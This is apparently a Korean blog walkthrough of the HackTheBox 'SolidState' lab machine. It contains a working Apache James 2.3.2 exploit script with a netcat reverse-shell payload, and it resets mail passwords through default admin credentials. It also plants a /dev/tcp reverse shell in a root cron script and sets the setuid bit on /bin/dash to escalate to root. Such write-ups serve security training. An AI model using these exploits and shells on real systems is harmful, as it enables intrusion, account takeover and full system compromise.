1. SCANNING
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
| ssh-hostkey:
| 2048 77:00:84:f5:78:b9:c7:d3:54:cf:71:2e:0d:52:6d:8b (RSA)
| 256 78:b8:3a:f6:60:19:06:91:f5:53:92:1d:3f:48:ed:53 (ECDSA)
|_ 256 e4:45:e9:ed:07:4d:73:69:43:5a:12:70:9d:c4:af:76 (ED25519)
25/tcp open smtp JAMES smtpd 2.3.2
|_smtp-commands: solidstate Hello nmap.scanme.org (10.10.14.13 [10.10.14.13]),
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Home - Solid State Security
110/tcp open pop3 JAMES pop3d 2.3.2
119/tcp open nntp JAMES nntpd (posting ok)
4555/tcp open james-admin JAMES Remote Admin 2.3.2
Aggressive OS guesses: Linux 3.13 (95%), Linux 3.2 - 4.9 (95%), Linux 3.16 (95%), Linux 3.12 (95%), Linux 3.18 (95%), Linux 3.8 - 3.11 (95%), Linux 4.2 (95%), Linux 4.8 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%), Linux 4.4 (95%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: solidstate; OS: Linux; CPE: cpe:/o:linux:linux_kernel
┌──(root💀takudaddy)-[/htb/s]
└─# nc 10.10.10.51 4555 1 ⚙
JAMES Remote Administration Tool 2.3.2
Please enter your login and password
Login id:
james-admin
Password:
JAMES
Login failed for james-admin
Login id:
password
Password:
^C
┌──(root💀takudaddy)-[/htb/s]
└─# nc 10.10.10.51 119 1 ⨯ 1 ⚙
200 solidstate NNTP Service Ready, posting permitted
id
500 Unknown command
vrfy james
500 Unknown command
help
100 Help text follows
.
?
500 Unknown command
┌──(root💀takudaddy)-[/htb/s]
└─# nmap --script vuln -oA vulnscan 10.10.10.51 1 ⚙
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-23 19:20 KST
Nmap scan report for 10.10.10.51
Host is up (0.21s latency).
Not shown: 995 closed ports
PORT STATE SERVICE
22/tcp open ssh
25/tcp open smtp
| smtp-vuln-cve2010-4344:
|_ The SMTP server is not Exim: NOT VULNERABLE
|_sslv2-drown:
80/tcp open http
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.10.10.51
| Found the following possible CSRF vulnerabilities:
|
| Path: http://10.10.10.51:80/
| Form id: name
| Form action: #
|
| Path: http://10.10.10.51:80/index.html
| Form id: name
| Form action: #
|
| Path: http://10.10.10.51:80/about.html
| Form id: name
| Form action: #
|
| Path: http://10.10.10.51:80/services.html
| Form id: name
|_ Form action: #
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
| /README.txt: Interesting, a readme.
|_ /images/: Potentially interesting directory w/ listing on 'apache/2.4.25 (debian)'
| http-sql-injection:
| Possible sqli for queries:
| http://10.10.10.51:80/assets/js/?C=M%3bO%3dA%27%20OR%20sqlspider
| http://10.10.10.51:80/assets/js/?C=D%3bO%3dA%27%20OR%20sqlspider
| http://10.10.10.51:80/assets/js/?C=S%3bO%3dA%27%20OR%20sqlspider
| http://10.10.10.51:80/assets/js/?C=N%3bO%3dD%27%20OR%20sqlspider
| http://10.10.10.51:80/assets/js/?C=M%3bO%3dD%27%20OR%20sqlspider
| http://10.10.10.51:80/assets/js/?C=D%3bO%3dA%27%20OR%20sqlspider
| http://10.10.10.51:80/assets/js/?C=N%3bO%3dA%27%20OR%20sqlspider
| http://10.10.10.51:80/assets/js/?C=S%3bO%3dA%27%20OR%20sqlspider
| http://10.10.10.51:80/assets/js/ie/?C=N%3bO%3dD%27%20OR%20sqlspider
| http://10.10.10.51:80/assets/js/ie/?C=D%3bO%3dA%27%20OR%20sqlspider
| http://10.10.10.51:80/assets/js/ie/?C=M%3bO%3dA%27%20OR%20sqlspider
| http://10.10.10.51:80/assets/js/ie/?C=S%3bO%3dA%27%20OR%20sqlspider
| http://10.10.10.51:80/assets/?C=S%3bO%3dA%27%20OR%20sqlspider
| http://10.10.10.51:80/assets/?C=M%3bO%3dA%27%20OR%20sqlspider
| http://10.10.10.51:80/assets/?C=D%3bO%3dA%27%20OR%20sqlspider
| http://10.10.10.51:80/assets/?C=N%3bO%3dD%27%20OR%20sqlspider
| http://10.10.10.51:80/assets/js/?C=M%3bO%3dA%27%20OR%20sqlspider
| http://10.10.10.51:80/assets/js/?C=S%3bO%3dA%27%20OR%20sqlspider
| http://10.10.10.51:80/assets/js/?C=N%3bO%3dA%27%20OR%20sqlspider
|_ http://10.10.10.51:80/assets/js/?C=D%3bO%3dD%27%20OR%20sqlspider
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
110/tcp open pop3
|_sslv2-drown:
119/tcp open nntp
|_sslv2-drown:
james
┌──(root💀takudaddy)-[/htb/s]
└─# nc 10.10.10.51 4555 1 ⚙
JAMES Remote Administration Tool 2.3.2
Please enter your login and password
Login id:
james-admin
Password:
JAMES
Login failed for james-admin
Login id:
password
Password:
^C
┌──(root💀takudaddy)-[/htb/s]
└─# nc 10.10.10.51 119 1 ⨯ 1 ⚙
200 solidstate NNTP Service Ready, posting permitted
id
500 Unknown command
vrfy james
500 Unknown command
help
100 Help text follows
.
?
500 Unknown command
2. WEB ENUMERATTION
┌──(root💀takudaddy)-[/htb]
└─# gobuster dir -f -t 50 -u http://10.10.10.51 -w /usr/share/wordlists/dirb/small.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.51
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/wordlists/dirb/small.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Add Slash: true
[+] Timeout: 10s
===============================================================
2021/04/23 19:10:00 Starting gobuster in directory enumeration mode
===============================================================
/assets/ (Status: 200) [Size: 1496]
/images/ (Status: 200) [Size: 2516]
/icons/ (Status: 403) [Size: 292]
webadmin@solid-state-security.com
3. EXPLOITATION
┌──(root💀takudaddy)-[/htb/s]
└─# cat attack.py 1 ⚙
#!/usr/bin/python
#
# Exploit Title: Apache James Server 2.3.2 Authenticated User Remote Command Execution
# Date: 16\10\2014
# Exploit Author: Jakub Palaczynski, Marcin Woloszyn, Maciej Grabiec
# Vendor Homepage: http://james.apache.org/server/
# Software Link: http://ftp.ps.pl/pub/apache/james/server/apache-james-2.3.2.zip
# Version: Apache James Server 2.3.2
# Tested on: Ubuntu, Debian
# Info: This exploit works on default installation of Apache James Server 2.3.2
# Info: Example paths that will automatically execute payload on some action: /etc/bash_completion.d , /etc/pm/config.d
# specify payload
#payload = 'touch /tmp/proof.txt' # to exploit on any user
#payload = '[ "$(id -u)" == "0" ] && touch /root/proof.txt' # to exploit only on root
payload = 'nc -e /bin/bash 10.10.14.13 7979 &'
# credentials to James Remote Administration Tool (Default - root/root)
user = 'root'
pwd = 'root'
if len(sys.argv) != 2:
sys.stderr.write("[-]Usage: python %s <ip>\n" % sys.argv[0])
sys.stderr.write("[-]Exemple: python %s 127.0.0.1\n" % sys.argv[0])
sys.exit(1)
ip = sys.argv[1]
def recv(s):
s.recv(1024)
time.sleep(0.2)
try:
print "[+]Connecting to James Remote Administration Tool..."
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('10.10.10.51',80))
s.recv(1024)
s.send(user + "\n")
s.recv(1024)
s.send(pwd + "\n")
s.recv(1024)
print "[+]Creating user..."
s.send("adduser ../../../../../../../../etc/bash_completion.d exploit\n")
s.recv(1024)
s.send("quit\n")
s.close()
print "[+]Connecting to James SMTP server..."
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('10.10.10.51',25))
s.send("ehlo team@team.pl\r\n")
recv(s)
print "[+]Sending payload..."
s.send("mail from: <'@team.pl>\r\n")
recv(s)
# also try s.send("rcpt to: <../../../../../../../../etc/bash_completion.d@hostname>\r\n") if the recipient cannot be found
s.send("rcpt to: <../../../../../../../../etc/bash_completion.d>\r\n")
recv(s)
s.send("data\r\n")
recv(s)
s.send("From: team@team.pl\r\n")
s.send("\r\n")
s.send("'\n")
s.send(payload + "\n")
s.send("\r\n.\r\n")
recv(s)
s.send("quit\r\n")
recv(s)
s.close()
print "[+]Done! Payload will be executed once somebody logs in."
except:
print "Connection failed."
┌──(root💀takudaddy)-[/htb/s]
└─# ./attack.py 10.10.10.51 1 ⨯ 1 ⚙
[+]Connecting to James Remote Administration Tool...
[+]Creating user...
[+]Connecting to James SMTP server...
[+]Sending payload...
[+]Done! Payload will be executed once somebody logs in.
┌──(root💀takudaddy)-[/htb]
└─# nc 10.10.10.51 4555 1 ⨯
JAMES Remote Administration Tool 2.3.2
Please enter your login and password
Login id:
root
Password:
root
Welcome root. HELP for a list of commands
HELP
Currently implemented commands:
help display this help
listusers display existing accounts
countusers display the number of existing accounts
adduser [username] [password] add a new user
verify [username] verify if specified user exist
deluser [username] delete existing user
setpassword [username] [password] sets a user's password
setalias [user] [alias] locally forwards all email for 'user' to 'alias'
showalias [username] shows a user's current email alias
unsetalias [user] unsets an alias for 'user'
setforwarding [username] [emailaddress] forwards a user's email to another email address
showforwarding [username] shows a user's current email forwarding
unsetforwarding [username] removes a forward
user [repositoryname] change to another user repository
shutdown kills the current JVM (convenient when James is run as a daemon)
quit close connection
listusers
Existing accounts 5
user: james
user: thomas
user: john
user: mindy
user: mailadmin
Unknown command
countusers
Existing accounts 5
adduser takudaddy takudaddy
User takudaddy added
setpassword james takudaddy
Password for james reset
setpassword thomas takudaddy
Password for thomas reset
setpassword john takudaddy
Password for john reset
setpassword mindy takudaddy
Password for mindy reset
setpasswrod mailadmin takudaddy
Unknown command setpasswrod mailadmin takudaddy
setpassword mailadmin takudaddy
Password for mailadmin reset
thunderbird로 메일 뒤져보기
툴을 사용하지 않고 바로 확인하려면
telnet으로 110번에 붙는다.
┌──(root💀takudaddy)-[/htb/s]
└─# telnet 10.10.10.51 110 1 ⨯ 1 ⚙
Trying 10.10.10.51...
Connected to 10.10.10.51.
Escape character is '^]'.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready
USER mindy
+OK
PASS takudaddy
+OK Welcome mindy
RETR
-ERR Usage: RETR [mail number]
RETR 1
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <5420213.0.1503422039826.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: mindy@localhost
Received: from 192.168.11.142 ([192.168.11.142])
by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 798
for <mindy@localhost>;
Tue, 22 Aug 2017 13:13:42 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:13:42 -0400 (EDT)
From: mailadmin@localhost
Subject: Welcome
Dear Mindy,
Welcome to Solid State Security Cyber team! We are delighted you are joining us as a junior defense analyst. Your role is critical in fulfilling the mission of our orginzation. The enclosed information is designed to serve as an introduction to Cyber Security and provide resources that will help you make a smooth transition into your new role. The Cyber team is here to support your transition so, please know that you can call on any of us to assist you.
We are looking forward to you joining our team and your success at Solid State Security.
Respectfully,
James
.
RETR 2
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <16744123.2.1503422270399.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: mindy@localhost
Received: from 192.168.11.142 ([192.168.11.142])
by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581
for <mindy@localhost>;
Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
From: mailadmin@localhost
Subject: Your Access
Dear Mindy,
Here are your ssh credentials to access the system. Remember to reset your password after your first login.
Your access is restricted at the moment, feel free to ask your supervisor to add any commands you need to your path.
username: mindy
pass: P@55W0rd1!2@
Respectfully,
James
username: mindy
pass: P@55W0rd1!2@
┌──(root💀takudaddy)-[/htb]
└─# ssh mindy@10.10.10.51
mindy@10.10.10.51's password:
Linux solidstate 4.9.0-3-686-pae #1 SMP Debian 4.9.30-2+deb9u3 (2017-08-06) i686
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc//copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Aug 22 14:00:02 2017 from 192.168.11.142
mindy@solidstate:~$
침투 성공
4. POST EXPLOITATION & PRIVILEGE ESCALATION
mindy@solidstate:~$ ls -al
total 28
drwxr-x--- 4 mindy mindy 4096 Nov 18 09:38 .
drwxr-xr-x 4 root root 4096 Aug 22 2017 ..
lrwxrwxrwx 1 root root 9 Nov 18 09:38 .bash_history -> /dev/null
-rw-r--r-- 1 root root 0 Aug 22 2017 .bash_logout
-rw-r--r-- 1 root root 338 Aug 22 2017 .bash_profile
-rw-r--r-- 1 root root 1001 Aug 22 2017 .bashrc
drwxr-x--- 2 mindy mindy 4096 Aug 22 2017 bin
-rw------- 1 root root 0 Aug 22 2017 .rhosts
-rw------- 1 root root 0 Aug 22 2017 .shosts
drw------- 2 root root 4096 Aug 22 2017 .ssh
-rw------- 1 mindy mindy 33 Nov 18 09:29 user.txt
mindy@solidstate:~$ cat user.txt
0510e71c2e8c9cb333b36a38080d0dc2
mindy@solidstate:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
_apt:x:104:65534::/nonexistent:/bin/false
usbmux:x:105:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
rtkit:x:106:110:RealtimeKit,,,:/proc:/bin/false
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/bin/false
messagebus:x:108:111::/var/run/dbus:/bin/false
geoclue:x:109:115::/var/lib/geoclue:/bin/false
avahi:x:110:117:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
colord:x:111:118:colord colour management daemon,,,:/var/lib/colord:/bin/false
saned:x:112:119::/var/lib/saned:/bin/false
speech-dispatcher:x:113:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
pulse:x:114:120:PulseAudio daemon,,,:/var/run/pulse:/bin/false
hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false
Debian-gdm:x:116:122:Gnome Display Manager:/var/lib/gdm3:/bin/false
sshd:x:117:65534::/run/sshd:/usr/sbin/nologin
james:x:1000:1000:james:/home/james/:/bin/bash
mindy:x:1001:1001:mindy:/home/mindy:/bin/rbash
mindy 유저의 bash는 rbash (redsticted bash)로
명령어 제한이 걸려있다.
mindy@solidstate:~$ cat /etc/shells
# /etc/shells: valid login shells
/bin/sh
/bin/dash
/bin/bash
/bin/rbash
mindy@solidstate:~$ bash
-rbash: bash: command not found
mindy@solidstate:~$ sh
-rbash: sh: command not found
mindy@solidstate:~$
해결 방법은 로그아웃 후
ssh로 재 로그인 하는데
bash 혹은 sh을 추가로 입력해준다.
┌──(root💀takudaddy)-[/htb]
└─# ssh mindy@10.10.10.51 bash
mindy@10.10.10.51's password:
id
uid=1001(mindy) gid=1001(mindy) groups=1001(mindy)
which python
/usr/bin/python
exit
┌──(root💀takudaddy)-[/htb]
└─# ssh mindy@10.10.10.51 sh
mindy@10.10.10.51's password:
id
uid=1001(mindy) gid=1001(mindy) groups=1001(mindy)
< / -perm -u=s -type f -exec ls -l {} \; 2>/dev/null
-rwsr-xr-x 1 root root 39144 May 17 2017 /bin/su
-rwsr-xr-x 1 root root 38940 Mar 22 2017 /bin/mount
-rwsr-xr-x 1 root root 30112 Jun 23 2016 /bin/fusermount
-rwsr-xr-x 1 root root 68076 Nov 10 2016 /bin/ping
-rwsr-xr-x 1 root root 161520 Feb 26 2017 /bin/ntfs-3g
-rwsr-xr-x 1 root root 26504 Mar 22 2017 /bin/umount
-rwsr-xr-x 1 root root 34920 May 17 2017 /usr/bin/newgrp
-rwsr-xr-x 1 root root 22304 May 24 2017 /usr/bin/pkexec
-rwsr-xr-x 1 root root 57972 May 17 2017 /usr/bin/passwd
-rwsr-xr-x 1 root root 39632 May 17 2017 /usr/bin/chsh
-rwsr-xr-x 1 root root 48560 May 17 2017 /usr/bin/chfn
-rwsr-xr-x 1 root root 78340 May 17 2017 /usr/bin/gpasswd
-rwsr-xr-- 1 root dip 363140 Nov 11 2016 /usr/sbin/pppd
-rwsr-xr-x 1 root root 13960 May 24 2017 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 525932 Jun 17 2017 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 5480 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-- 1 root messagebus 46436 Apr 5 2017 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-sr-x 1 root root 9772 Jul 7 2017 /usr/lib/xorg/Xorg.wrap
-rwsr-xr-x 1 root root 13672 Jan 14 2017 /usr/lib/spice-gtk/spice-client-glib-usb-acl-helper
${debian_chroot:+($debian_chroot)}mindy@solidstate:/tmp$ netstat -tul
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 0.0.0.0:ssh 0.0.0.0:* LISTEN
tcp 0 0 localhost:ipp 0.0.0.0:* LISTEN
tcp6 0 0 [::]:ssh [::]:* LISTEN
tcp6 0 0 localhost:ipp [::]:* LISTEN
tcp6 0 0 [::]:nntp [::]:* LISTEN
tcp6 0 0 [::]:smtp [::]:* LISTEN
tcp6 0 0 [::]:4555 [::]:* LISTEN
tcp6 0 0 [::]:pop3 [::]:* LISTEN
tcp6 0 0 [::]:http [::]:* LISTEN
udp 0 0 0.0.0.0:ipp 0.0.0.0:*
udp 0 0 0.0.0.0:36284 0.0.0.0:*
udp 0 0 0.0.0.0:mdns 0.0.0.0:*
udp 0 0 0.0.0.0:1900 0.0.0.0:*
udp6 0 0 [::]:mdns [::]:*
udp6 0 0 [::]:40505 [::]:*
${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ ps -ef
....
root 1065 1 0 10:33 ? 00:00:00 /usr/sbin/cups-browsed
mindy 1174 1 0 10:40 ? 00:00:00 bash
mindy 1175 1174 0 10:40 ? 00:00:00 python -c import pty;pty.spawn("
mindy 1176 1175 0 10:40 pts/1 00:00:00 /bin/bash
root 1216 2 0 10:44 ? 00:00:00 [kworker/0:1]
root 1351 394 0 11:03 ? 00:00:00 /usr/sbin/CRON -f
root 1352 1351 0 11:03 ? 00:00:00 /bin/sh -c python /opt/tmp.py
root 1353 1352 0 11:03 ? 00:00:00 python /opt/tmp.py
...
${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ cat tmp.py
#!/usr/bin/env python
import os
import sys
try:
os.system('rm -r /tmp/* ')
except:
sys.exit()
${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$
/opt/tmp.py 파일이
루트 권한으로 실행되었다.
vi 편집기 정상 사용이 불가능해
호스트에서 파일을 만들어 가지고 와
대체해본다.
┌──(root💀takudaddy)-[/htb/s]
└─# cat tmp.py 1 ⚙
#!/bin/usr/env python
import os
import sys
try:
os.system("bash -i >&/dev/tcp/10.10.14.13/7979")
except:
sys.exit()
┌──(root💀takudaddy)-[/htb/s]
└─# python -m SimpleHTTPServer 1 ⚙
Serving HTTP on 0.0.0.0 port 8000 ...
침투 서버 /tmp 에 받고
/opt/tmp.py로 카피해준 뒤
리스너 기동하고 조금 기다리면 접속됨
┌──(root💀takudaddy)-[/htb/s]
└─# nc -lvnp 7979 1 ⨯ 1 ⚙
listening on [any] 7979 ...
connect to [10.10.14.13] from (UNKNOWN) [10.10.10.51] 39414
id
uid=0(root) gid=0(root) groups=0(root)
whoami
root
cat /root/root.txt
4f4afb55463c3bc79ab1e906b074953d
리버스 쉘을 실행시키는 방법 말고
#!/usr/bin/env python
import os
import sys
try:
os.system("chmod 4755 /bin/dash")
except:
sys.exit()
dash에 setuid 비트를 걸어준 뒤
조금 기다린 후 dash를 입력하면
${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ ls -l /bin/dash
ls -l /bin/dash
-rwxr-xr-x 1 root root 124492 Jan 24 2017 /bin/dash
${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ ls -l /bin/dash
ls -l /bin/dash
-rwsr-xr-x 1 root root 124492 Jan 24 2017 /bin/dash
${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ dash
dash
# id
id
uid=1001(mindy) gid=1001(mindy) euid=0(root) groups=1001(mindy)
# cat /root/root.txt
cat /root/root.txt
4f4afb55463c3bc79ab1e906b074953d
u/gid는 여전히 mindy이지만
root 권한을 일시적으로 갖고 있는
상태가 되었다.
끝
728x90
'OSCP > HacktheBox' 카테고리의 다른 글
| 15. Armageddon (0) | 2021.07.20 |
|---|---|
| 14. Node (0) | 2021.04.24 |
| 12. Nineveh (0) | 2021.04.23 |
| 11. Brainfuck (0) | 2021.04.22 |
| 10. Sense (0) | 2021.04.22 |